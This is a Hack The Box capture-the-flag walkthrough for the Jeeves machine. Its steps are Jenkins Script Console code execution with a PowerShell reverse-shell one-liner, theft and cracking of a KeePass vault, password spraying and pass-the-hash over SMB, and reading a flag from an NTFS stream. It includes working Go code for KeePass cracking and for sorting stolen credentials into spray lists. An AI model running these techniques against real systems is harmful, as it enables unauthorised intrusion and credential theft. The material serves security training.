Jeeves

1. User

1.1. Recon

1.1.1. PortScan

┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# nmap 10.129.24.24
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-18 09:55 EST
Nmap scan report for 10.129.24.24
Host is up (0.25s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
50000/tcp open  ibm-db2

Nmap done: 1 IP address (1 host up) scanned in 32.88 seconds

┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# nmap 10.129.24.24 -p 80,50000 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-18 09:59 EST
Nmap scan report for JEEVES.Jeeves (10.129.24.24)
Host is up (0.23s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
50000/tcp open  http    Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.22 seconds

Jetty is a lightweight Java web server and servlet container. Java web applications such as Jenkins commonly embed it to serve their own UI directly, so a bare Jetty banner on a high port is a strong hint that a Java application, very possibly Jenkins, lives behind it.

1.2. web

Pasted image 20251118225816.png
Sure enough, it's the old butler again, identical to the one Jenkins uses.

1.2.1. dir

┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# feroxbuster -u http://10.129.24.24/

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.129.24.24/
 🚩  In-Scope Url          │ 10.129.24.24
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        1l        4w       50c http://10.129.24.24/error.html
200      GET      147l      319w     3744c http://10.129.24.24/style.css
200      GET       17l       40w      503c http://10.129.24.24/
[####>---------------] - 40s     6442/30004   3m      found:3       errors:0
400      GET        6l       26w      324c http://10.129.24.24/error%1F_log
[####################] - 4m     30004/30004   0s      found:4       errors:107
[####################] - 4m     30000/30000   115/s   http://10.129.24.24/


1.3. web 50000 Jetty

Pasted image 20251119001057.png

Very little useful information so far. This is a 2017 box, and paths on machines of that era don't need anything exotic, so it is worth switching to a larger wordlist and brute-forcing the Jetty port.


┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# feroxbuster -u http://10.129.24.24:50000 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.129.24.24:50000/
 🚩  In-Scope Url          │ 10.129.24.24
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       11l       26w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302      GET        0l        0w        0c http://10.129.24.24:50000/askjeeves => http://10.129.24.24:50000/askjeeves/
302      GET        0l        0w        0c http://10.129.24.24:50000/askjeeves/search => http://10.129.24.24:50000/askjeeves/search/
302      GET        0l        0w        0c http://10.129.24.24:50000/askjeeves/about => http://10.129.24.24:50000/askjeeves/about/
302      GET        0l        0w        0c http://10.129.24.24:50000/askjeeves/security => http://10.129.24.24:50000/askjeeves/security/
302      GET        0l        0w        0c http://10.129.24.24:50000/askjeeves/projects => http://10.129.24.24:50000/askjeeves/projects/
302      GET        0l        0w        0c http://10.129.24.24:50000/askjeeves/j_acegi_security_check => http://10.129.24.24:50000/askjeeves/loginError
200      GET       16l      507w    11404c http://10.129.24.24:50000/askjeeves/login
500      GET       93l      598w    15433c http://10.129.24.24:50000/askjeeves/main
302      GET        0l        0w        0c http://10.129.24.24:50000/askjeeves/people => http://10.129.24.24:50000/askjeeves/people/
200      GET       15l      509w    11691c http://10.129.24.24:50000/askjeeves/editDescription
404      GET       16l      266w     7098c http://10.129.24.24:50000/askjeeves/signup
302      GET        0l        0w        0c http://10.129.24.24:50000/askjeeves/version => http://10.129.24.24:50000/askjeeves/version/
200      GET       14l      325w     8383c http://10.129.24.24:50000/askjeeves/newJob
200      GET       16l      508w    11526c http://10.129.24.24:50000/askjeeves/index
302      GET        0l        0w        0c http://10.129.24.24:50000/askjeeves/api/search => http://10.129.24.24:50000/askjeeves/api/search/
302      GET        0l        0w        0c http://10.129.24.24:50000/askjeeves/assets => http://10.129.24.24:50000/askjeeves/assets/
200      GET        1l        8w      663c http://10.129.24.24:50000/askjeeves/api/xml
200      GET        1l        4w      543c http://10.129.24.24:50000/askjeeves/api/python
302      GET        0l        0w        0c http://10.129.24.24:50000/askjeeves/api => http://10.129.24.24:50000/askjeeves/api/
200      GET       16l      492w    11015c http://10.129.24.24:50000/askjeeves/restart

A /askjeeves path exists. The routes under it (/login, /j_acegi_security_check, /newJob, /restart, /api/xml) are Jenkins' own, so this is a Jenkins instance mounted at /askjeeves, and /newJob answering 200 means it is reachable without authentication.

1.4. jenkins

Jenkins
Pasted image 20251119003323.png
The classic Jenkins butler.

Go straight to the Script Console (Manage Jenkins > Script Console, i.e. /askjeeves/script) and run a Groovy one-liner to spawn a shell; the script executes with the privileges of the Jenkins service account, which is why an unauthenticated console is a direct code-execution primitive. The payload below runs a base64-encoded PowerShell reverse shell:
Pasted image 20251119004924.png

println "powershell -e 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".execute().text

2. system

Output of whoami /priv in the shell obtained from Jenkins:

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
>>>> SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

SeImpersonatePrivilege being Enabled is the usual precondition for the Potato-family escalations. But I couldn't get the binary onto the target, so I'll skip the Potato privilege escalation for now; there isn't much to learn from it anyway.

2.1. Enumeration

PS C:\users> tree /f /a
Folder PATH listing
Volume serial number is 00000200 71A1:6FA1
C:.
+---Administrator
+---DefaultAppPool
+---kohsuke
|   +---.groovy
|   |   \---grapes
|   +---Contacts
|   +---Desktop
|   |       user.txt
|   |
|   +---Documents
>>>> |   |       CEH.kdbx
|   |
|   +---Downloads
|   +---Favorites
|   |   |   Bing.url
|   |   |
|   |   \---Links
|   +---Links
|   |       Desktop.lnk
|   |       Downloads.lnk
|   |       OneDrive.lnk
|   |
|   +---Music
|   +---OneDrive
|   +---Pictures
|   |   +---Camera Roll
|   |   \---Saved Pictures
|   +---Saved Games
|   +---Searches
|   |       winrt--{S-1-5-21-2851396806-8246019-2289784878-1001}-.searchconnector-ms
|   |
|   \---Videos
\---Public
    +---Documents
    +---Downloads
    +---Music
    +---Pictures
    \---Videos

Use the Jenkins web UI to get CEH.kdbx out: copy it into a job's workspace directory, which Jenkins serves through its workspace browser.

PS C:\Users\Administrator\.jenkins\workspace\xxxx> copy C:\users\kohsuke\documents\CEH.kdbx  .
PS C:\Users\Administrator\.jenkins\workspace\xxxx> dir


    Directory: C:\Users\Administrator\.jenkins\workspace\xxxx


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/18/2017   1:43 PM           2846 CEH.kdbx

The file then appears in the job's Workspace view and can be downloaded from there.
Pasted image 20251119225117.png

2.2. KeePass crack

┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# keepass2john CEH.kdbx
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

Save the hash to hash.txt and run it through hashcat mode 13400 (KeePass 2, AES-KDF) against rockyou.txt, here on a Windows host with a GPU:

D:\tools\加解密\hashcat-6.2.6>hashcat.exe -m 13400 hash.txt rockyou.txt

$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48:moonshine1

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea...47db48
Time.Started.....: Wed Nov 19 22:57:16 2025 (25 secs)
Time.Estimated...: Wed Nov 19 22:57:41 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:   171.4 kH/s (4.08ms) @ Accel:704 Loops:1 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4325376/14344388 (30.15%)
Rejected.........: 0/4325376 (0.00%)
Restore.Point....: 0/14344388 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:5999-6000
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> redskins1980
Hardware.Mon.#01.: Temp: 59c Util: 98% Core:2325MHz Mem:8001MHz Bus:8

Password: moonshine1. The 6000 in the hash is the AES-KDF transform round count from the file header, which is low by today's standards and is why one GPU gets through 30% of rockyou.txt (4.3 million candidates) in 25 seconds at about 170 kH/s.
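To make clear what hashcat mode 13400 actually verifies for each candidate, here is an added Go example (not part of the original writeup, and not hashcat's or KeePass's code) that re-implements the KDBX 3.x check from the keepass2john line above using only the Go standard library. It assumes the database is protected by a password alone (no key file, which keepass2john would otherwise fold into the composite key); the three-entry candidate list in main is constructed to stand in for rockyou.txt.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// The keepass2john line from this writeup (KDBX 3.x, AES-KDF, 6000 rounds).
const jeevesHash = "CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48"

// Keepass2Hash is a parsed "$keepass$*2*..." line. Field order after the version:
// rounds * algorithm(0=AES) * masterSeed * transformSeed * IV * streamStartBytes * first 32 ciphertext bytes.
type Keepass2Hash struct {
	Rounds        uint64
	MasterSeed    []byte // 32 bytes, mixed into the final key
	TransformSeed []byte // 32 bytes, the AES-256 key used by the KDF rounds
	IV            []byte // 16 bytes, CBC IV of the encrypted payload
	StreamStart   []byte // 32 bytes the decrypted payload must begin with
	FirstCipher   []byte // first 32 bytes of the encrypted payload
}

// ParseKeepass2Hash accepts the line with or without the "name:" prefix keepass2john prints.
func ParseKeepass2Hash(line string) (*Keepass2Hash, error) {
	line = strings.TrimSpace(line)
	if i := strings.Index(line, "$keepass$"); i > 0 {
		line = line[i:]
	}
	f := strings.Split(line, "*")
	if len(f) != 9 || f[0] != "$keepass$" || f[1] != "2" {
		return nil, errors.New("not a $keepass$*2* (KDBX 3.x) hash")
	}
	rounds, err := strconv.ParseUint(f[2], 10, 64)
	if err != nil {
		return nil, fmt.Errorf("rounds: %w", err)
	}
	h := &Keepass2Hash{Rounds: rounds}
	dst := []*[]byte{&h.MasterSeed, &h.TransformSeed, &h.IV, &h.StreamStart, &h.FirstCipher}
	want := []int{32, 32, 16, 32, 32}
	for i, p := range dst {
		b, err := hex.DecodeString(f[4+i])
		if err != nil || len(b) != want[i] {
			return nil, fmt.Errorf("field %d: expected %d hex-encoded bytes", 4+i, want[i])
		}
		*p = b
	}
	return h, nil
}

// MasterKey reproduces KeePass 2.x key derivation for a password-only database:
// composite = SHA256(SHA256(pw)); AES-256-ECB encrypt it Rounds times under TransformSeed;
// transformed = SHA256(result); master = SHA256(MasterSeed || transformed).
func MasterKey(h *Keepass2Hash, password string) []byte {
	pwHash := sha256.Sum256([]byte(password))
	composite := sha256.Sum256(pwHash[:])
	kdf, _ := aes.NewCipher(h.TransformSeed) // 32-byte key, length checked by the parser
	buf := composite[:]
	for i := uint64(0); i < h.Rounds; i++ {
		kdf.Encrypt(buf[:16], buf[:16]) // ECB: each 16-byte half on its own
		kdf.Encrypt(buf[16:], buf[16:])
	}
	transformed := sha256.Sum256(buf)
	final := sha256.New()
	final.Write(h.MasterSeed)
	final.Write(transformed[:])
	return final.Sum(nil)
}

// CheckPassword is the per-candidate test hashcat -m 13400 performs: decrypt the
// first two payload blocks with the derived key and compare them to StreamStartBytes.
func CheckPassword(h *Keepass2Hash, password string) bool {
	block, _ := aes.NewCipher(MasterKey(h, password)) // SHA-256 output, always 32 bytes
	plain := make([]byte, len(h.FirstCipher))
	cipher.NewCBCDecrypter(block, h.IV).CryptBlocks(plain, h.FirstCipher)
	return bytes.Equal(plain, h.StreamStart)
}

func main() {
	h, err := ParseKeepass2Hash(jeevesHash)
	if err != nil {
		panic(err)
	}
	// Constructed three-entry "wordlist" standing in for rockyou.txt.
	for _, c := range []string{"123456", "password", "moonshine1"} {
		fmt.Printf("%-12s %v\n", c, CheckPassword(h, c))
	}
}
```

Run as is, it prints one line per candidate with true or false; only moonshine1 comes out true. Because the check needs only the header fields plus 32 bytes of ciphertext, the keepass2john line is all an attacker has to carry off the box, which is why the .kdbx never needs to leave the workspace for cracking to proceed.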

┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# keepassxc-cli ls CEH.kdbx
Enter password to unlock CEH.kdbx:
Walmart.com
Bank of America
>>>> It's a secret
EC-Council
Keys to the kingdom
DC Recovery PW
Jenkins admin
Backup stuff
General/
Windows/
Network/
Internet/
eMail/
Homebanking/

┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# keepassxc-cli export CEH.kdbx --format csv
Enter password to unlock CEH.kdbx:
"Group","Title","Username","Password","URL","Notes","TOTP","Icon","Last Modified","Created"
"CEH","Walmart.com","anonymous","Password","http://www.walmart.com","Getting my shopping on","","0","2017-09-18T17:38:16Z","2017-09-16T02:16:31Z"
"CEH","Bank of America","Michael321","12345","https://www.bankofamerica.com","","","0","2017-09-18T17:38:42Z","2017-09-16T02:16:31Z"
"CEH","It's a secret","admin","F7WhTrSFDKB6sxHU1cUn","http://localhost:8180/secret.jsp","","","0","2017-09-18T17:39:24Z","2017-09-18T17:38:45Z"
"CEH","EC-Council","hackerman123","pwndyouall!","https://www.eccouncil.org/programs/certified-ethical-hacker-ceh","Personal login","","0","2017-09-18T17:40:19Z","2017-09-18T17:39:35Z"
"CEH","Keys to the kingdom","bob","lCEUnYPjNfIuPZSzOySA","","","","0","2017-09-18T17:40:34Z","2017-09-18T17:40:22Z"
"CEH","DC Recovery PW","administrator","S1TjAtJHKsugh9oC4VZl","","","","0","2017-09-18T17:41:03Z","2017-09-18T17:40:37Z"
"CEH","Jenkins admin","admin","","http://localhost:8080","We don't even need creds! Unhackable! ","","0","2017-09-18T17:41:57Z","2017-09-18T17:41:08Z"
"CEH","Backup stuff","?","aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00","","","","0","2017-09-18T17:42:53Z","2017-09-18T17:42:06Z"

Put the vault's passwords into a file (pass) and spray them against the local administrator account over SMB:

12345
S1TjAtJHKsugh9oC4VZl
pwndyouall!
F7WhTrSFDKB6sxHU1cUn
lCEUnYPjNfIuPZSzOySA
Password
┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# nxc smb 10.129.24.24 -u administrator -p pass
SMB         10.129.24.24    445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB         10.129.24.24    445    JEEVES           [-] Jeeves\administrator:12345 STATUS_LOGON_FAILURE
SMB         10.129.24.24    445    JEEVES           [-] Jeeves\administrator:S1TjAtJHKsugh9oC4VZl STATUS_LOGON_FAILURE
SMB         10.129.24.24    445    JEEVES           [-] Jeeves\administrator:pwndyouall! STATUS_LOGON_FAILURE
SMB         10.129.24.24    445    JEEVES           [-] Jeeves\administrator:F7WhTrSFDKB6sxHU1cUn STATUS_LOGON_FAILURE
SMB         10.129.24.24    445    JEEVES           [-] Jeeves\administrator:lCEUnYPjNfIuPZSzOySA STATUS_LOGON_FAILURE
SMB         10.129.24.24    445    JEEVES           [-] Jeeves\administrator:Password STATUS_LOGON_FAILURE

The "Backup stuff" entry is not a password but an LM:NT hash pair:

aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

Pasted image 20251119231104.png

No plaintext comes up for it. The LM half (aad3b435b51404eeaad3b435b51404ee) is the well-known value meaning "no LM hash stored", so only the NT half matters, and an NT hash is all NTLM authentication needs: pass the hash to nxc and log in as administrator without ever cracking it. nxc's [+] line marks the successful logon even though its follow-up "is admin" check times out:

┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# nxc smb 10.129.24.24 -u administrator -H e0fb1fb85756c24235ff238cbe81fe00
SMB         10.129.24.24    445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB         10.129.24.24    445    JEEVES           [-] Error checking if user is admin on 10.129.24.24: The NETBIOS connection with the remote host timed out.
SMB         10.129.24.24    445    JEEVES           [+] Jeeves\administrator:e0fb1fb85756c24235ff238cbe81fe00
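The wordlist step and the hash step above are the same triage: split what the vault export contains into plaintexts for nxc -p and NT hashes for nxc -H. Here is an added Go example (not from the original writeup) that does that over the keepassxc-cli CSV export, embedded inline and trimmed to six columns; the column names and the LM:NT regex are assumptions about the export format that match what keepassxc-cli printed here.

```go
package main

import (
	"encoding/csv"
	"fmt"
	"regexp"
	"strings"
)

// Constructed sample: the keepassxc-cli CSV export shown earlier, trimmed to six columns.
const vaultCSV = `"Group","Title","Username","Password","URL","Notes"
"CEH","Walmart.com","anonymous","Password","http://www.walmart.com","Getting my shopping on"
"CEH","Bank of America","Michael321","12345","https://www.bankofamerica.com",""
"CEH","It's a secret","admin","F7WhTrSFDKB6sxHU1cUn","http://localhost:8180/secret.jsp",""
"CEH","EC-Council","hackerman123","pwndyouall!","https://www.eccouncil.org/programs/certified-ethical-hacker-ceh","Personal login"
"CEH","Keys to the kingdom","bob","lCEUnYPjNfIuPZSzOySA","",""
"CEH","DC Recovery PW","administrator","S1TjAtJHKsugh9oC4VZl","",""
"CEH","Jenkins admin","admin","","http://localhost:8080","We don't even need creds! Unhackable! "
"CEH","Backup stuff","?","aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00","",""
`

// EmptyLM is the LM hash of the empty password: Windows stores it when LM hashing
// is disabled, so an LM:NT pair that starts with it carries only the NT half.
const EmptyLM = "aad3b435b51404eeaad3b435b51404ee"

var lmNTPair = regexp.MustCompile(`^([0-9a-fA-F]{32}):([0-9a-fA-F]{32})$`)

// SprayMaterial separates what goes to "nxc ... -p" from what goes to "nxc ... -H".
type SprayMaterial struct {
	Passwords []string // unique plaintexts, first-seen order
	NTHashes  []string // unique NT hashes, lowercase, for pass-the-hash
	Usernames []string // unique usernames, a ready-made user list
}

// TriageVault parses the export, skips blank passwords and routes hash-shaped
// entries to NTHashes instead of the plaintext list.
func TriageVault(csvText string) (SprayMaterial, error) {
	var m SprayMaterial
	r := csv.NewReader(strings.NewReader(csvText))
	r.FieldsPerRecord = -1
	rows, err := r.ReadAll()
	if err != nil {
		return m, err
	}
	if len(rows) == 0 {
		return m, fmt.Errorf("empty export")
	}
	col := map[string]int{}
	for i, name := range rows[0] {
		col[name] = i
	}
	uIdx, uOK := col["Username"]
	pIdx, pOK := col["Password"]
	if !uOK || !pOK {
		return m, fmt.Errorf("Username/Password columns not found in header")
	}
	seen := map[string]bool{}
	add := func(list *[]string, kind, v string) {
		if v == "" || seen[kind+":"+v] {
			return // blank values (the "Jenkins admin" entry) and repeats are dropped
		}
		seen[kind+":"+v] = true
		*list = append(*list, v)
	}
	for _, row := range rows[1:] {
		if len(row) <= uIdx || len(row) <= pIdx {
			continue
		}
		add(&m.Usernames, "u", row[uIdx])
		pw := row[pIdx]
		if mm := lmNTPair.FindStringSubmatch(pw); mm != nil {
			// pwdump/secretsdump style LM:NT. Only the NT half is needed for NTLM
			// authentication; the LM half is normally just EmptyLM.
			add(&m.NTHashes, "h", strings.ToLower(mm[2]))
			continue
		}
		add(&m.Passwords, "p", pw)
	}
	return m, nil
}

func main() {
	m, err := TriageVault(vaultCSV)
	if err != nil {
		panic(err)
	}
	fmt.Println("# nxc smb <target> -u administrator -p pass   (one per line -> pass)")
	fmt.Println(strings.Join(m.Passwords, "\n"))
	fmt.Println("# nxc smb <target> -u administrator -H <nt>   (pass-the-hash)")
	fmt.Println(strings.Join(m.NTHashes, "\n"))
}
```

The plaintext list it emits is exactly the six-line pass file sprayed above, and the single NT hash is the one that logged in. Keeping hashes out of the -p list matters in practice: a 65-character "password" would be tried and fail like any other, and the lockout counter on the target does not care that the guess was a hash.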

2.3. NTFS alternate data streams

c:\Users\Administrator\Desktop> type  hm.txt
The flag is elsewhere.  Look deeper.

"Look deeper" points at NTFS alternate data streams. dir's /R switch lists each file's alternate data streams (ADS), which a normal directory listing hides, so it shows whether extra content is attached to a file. In PowerShell, Get-Item -Stream * on a file does the same, and running it recursively over a directory tree is the quickest way to sweep for such streams beyond a single folder.

c:\Users\Administrator\Desktop> dir /R
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of c:\Users\Administrator\Desktop

11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
>>>>                                     34 hm.txt:root.txt:$DATA
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,634,866,688 bytes free
               
               
c:\Users\Administrator\Desktop> powershell -Command "Get-Content .\hm.txt -Stream root.txt"
afbc5bd4b615a60648cec41c6ac92530

# more also works: cmd's type cannot open a stream by name, but redirecting the stream into more can
c:\Users\Administrator\Desktop> more < hm.txt:root.txt:$DATA
afbc5bd4b615a60648cec41c6ac92530